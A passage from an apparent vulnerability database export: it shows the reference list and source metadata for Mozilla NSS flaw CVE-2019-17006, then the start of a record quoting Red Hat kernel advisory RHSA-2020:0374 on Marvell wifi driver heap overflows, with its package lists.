        "url": "https://www.auscert.org.au/bulletins/esb-2021.1207"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0834"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0933"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerabilitiy-has-been-fixed-in-ibm-security-identity-manager-virtual-appliancecve-2019-17006/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-announced-a-release-for-ibm-security-identity-governance-and-intelligence-in-response-to-a-security-vulnerability-cve-2019-17006-cve-2019-17023-cve-2020-12403/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-nss-and-nspr-cve-2019-17006/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3355/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1091"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1193"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/159497/red-hat-security-advisory-2020-4201-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/159553/red-hat-security-advisory-2020-4255-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-privileged-identity-manager-is-affected-by-security-vulnerabilities-7/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0986"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/mozilla-nss-buffer-overflow-via-cryptographic-primitives-31248"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0053/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021071301"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/158724/red-hat-security-advisory-2020-3280-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2650/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0001/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2604"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0491"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161706/red-hat-security-advisory-2021-0758-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2446/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/159661/red-hat-security-advisory-2020-4264-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021043017"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-announced-a-release-for-ibm-security-identity-governance-and-intelligence-in-response-to-a-security-vulnerability-cve-2019-17006-cve-2019-17023-cve-2020-12403-2/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161916/red-hat-security-advisory-2021-0949-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162142/red-hat-security-advisory-2021-1079-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161842/red-hat-security-advisory-2021-0876-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3461/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3631/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affected-by-multiple-mozilla-firefox-vulnerabilities/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162026/red-hat-security-advisory-2021-1026-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162130/red-hat-security-advisory-2021-1129-01.html"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2020-12403"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17023"
      },
      {
        "trust": 0.4,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12403"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12402"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-17023"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-12402"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5188"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-12749"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-12652"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12401"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-7595"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17546"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-11719"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14973"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17546"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12243"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12749"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-6829"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12652"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12400"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20388"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12243"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12400"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-11727"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11719"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5094"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11727"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5188"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-15903"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5094"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14973"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19956"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-5313"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17498"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17498"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20843"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/345.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111311"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12399"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/nss"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4231-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nss/2:3.45-1ubuntu2.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nss/2:3.42-1ubuntu2.5"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nss/2:3.35-2ubuntu2.7"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nss/2:3.28.4-0ubuntu0.16.04.10"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0758"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1026"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20907"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1079"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8625"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1971"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15999"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12401"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3156"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3447"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20191"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1971"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20180"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15999"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14422"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20178"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14422"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1240"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20386"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18874"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:4255"
      },
      {
        "trust": 0.1,
        "url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14822"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14822"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20386"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18874"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14365"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16935"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19126"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5482"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5482"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0876"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17007"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17007"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:3280"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-17006"
      },
      {
        "db": "PACKETSTORM",
        "id": "168879"
      },
      {
        "db": "PACKETSTORM",
        "id": "155889"
      },
      {
        "db": "PACKETSTORM",
        "id": "161706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162026"
      },
      {
        "db": "PACKETSTORM",
        "id": "162142"
      },
      {
        "db": "PACKETSTORM",
        "id": "159553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161842"
      },
      {
        "db": "PACKETSTORM",
        "id": "158724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-17006"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2019-17006",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168879",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "155889",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161706",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162026",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162142",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "159553",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "161842",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "158724",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2019-17006",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2020-10-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-17006",
        "ident": null
      },
      {
        "date": "2020-07-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "168879",
        "ident": null
      },
      {
        "date": "2020-01-09T15:06:17",
        "db": "PACKETSTORM",
        "id": "155889",
        "ident": null
      },
      {
        "date": "2021-03-09T15:56:20",
        "db": "PACKETSTORM",
        "id": "161706",
        "ident": null
      },
      {
        "date": "2021-03-30T14:29:43",
        "db": "PACKETSTORM",
        "id": "162026",
        "ident": null
      },
      {
        "date": "2021-04-09T15:06:13",
        "db": "PACKETSTORM",
        "id": "162142",
        "ident": null
      },
      {
        "date": "2020-10-14T16:52:18",
        "db": "PACKETSTORM",
        "id": "159553",
        "ident": null
      },
      {
        "date": "2021-03-17T14:35:53",
        "db": "PACKETSTORM",
        "id": "161842",
        "ident": null
      },
      {
        "date": "2020-08-03T17:14:53",
        "db": "PACKETSTORM",
        "id": "158724",
        "ident": null
      },
      {
        "date": "2019-12-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201912-1134",
        "ident": null
      },
      {
        "date": "2020-10-22T21:15:12.560000",
        "db": "NVD",
        "id": "CVE-2019-17006",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-02-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-17006",
        "ident": null
      },
      {
        "date": "2021-08-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201912-1134",
        "ident": null
      },
      {
        "date": "2024-11-21T04:31:31.573000",
        "db": "NVD",
        "id": "CVE-2019-17006",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "_id": null,
    "data": "Mozilla NSS Data forgery problem vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "_id": null,
    "data": "data forgery",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134"
      }
    ],
    "trust": 0.6
  }
}

VAR-201909-1526

Vulnerability from variot - Updated: 2026-03-09 20:55

There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. 7) - aarch64, noarch, ppc64le

Bug Fix(es):

Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)
Kernel modules generated incorrectly when system is localized to non-English language (BZ#1705285)
RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)
7.5) - ppc64, ppc64le, x86_64

Bug Fix(es):

Slow console output with ast (Aspeed) graphics driver (BZ#1780145)
core: backports from upstream (BZ#1794373)
System Crash on vport creation (NPIV on FCoE) (BZ#1796362)
[GSS] Can't access the mount point due to possible blocking of i/o on rbd (BZ#1796432)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2020:0374-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:0374 Issue date: 2020-02-04 CVE Names: CVE-2019-14816 CVE-2019-14895 CVE-2019-14898 CVE-2019-14901 CVE-2019-17133 =====================================================================

Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi driver (CVE-2019-14816)
kernel: heap-based buffer overflow in mwifiex_process_country_ie() function in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c (CVE-2019-14895)
kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)
kernel: buffer overflow in cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c (CVE-2019-17133)
kernel: incomplete fix for race condition between mmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599 (CVE-2019-14898)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

[Azure][7.8] Include patch "PCI: hv: Avoid use of hv_pci_dev->pci_slot after freeing it" (BZ#1766089)
[Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat, network interface(eth0) moved to new network namespace does not obtain IP address. (BZ#1766093)
[Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed (BZ#1766097)
SMB3: Do not error out on large file transfers if server responds with STATUS_INSUFFICIENT_RESOURCES (BZ#1767621)
Since RHEL commit 5330f5d09820 high load can cause dm-multipath path failures (BZ#1770113)
Hard lockup in free_one_page()->_raw_spin_lock() because sosreport command is reading from /proc/pagetypeinfo (BZ#1770732)
patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)
fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64 (BZ#1775678)
Guest crash after load cpuidle-haltpoll driver (BZ#1776289)
RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of retry delay value (BZ#1776290)
Multiple "mv" processes hung on a gfs2 filesystem (BZ#1777297)
Moving Egress IP will result in conntrack sessions being DESTROYED (BZ#1779564)
core: backports from upstream (BZ#1780033)
kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)
Race between tty_open() and flush_to_ldisc() using the tty_struct->driver_data field. (BZ#1780163)
Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

ppc64: bpftool-3.10.0-1062.12.1.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm perf-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1062.12.1.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm perf-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1062.12.1.el7.s390x.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm kernel-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-headers-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm perf-3.10.0-1062.12.1.el7.s390x.rpm perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm python-perf-3.10.0-1062.12.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

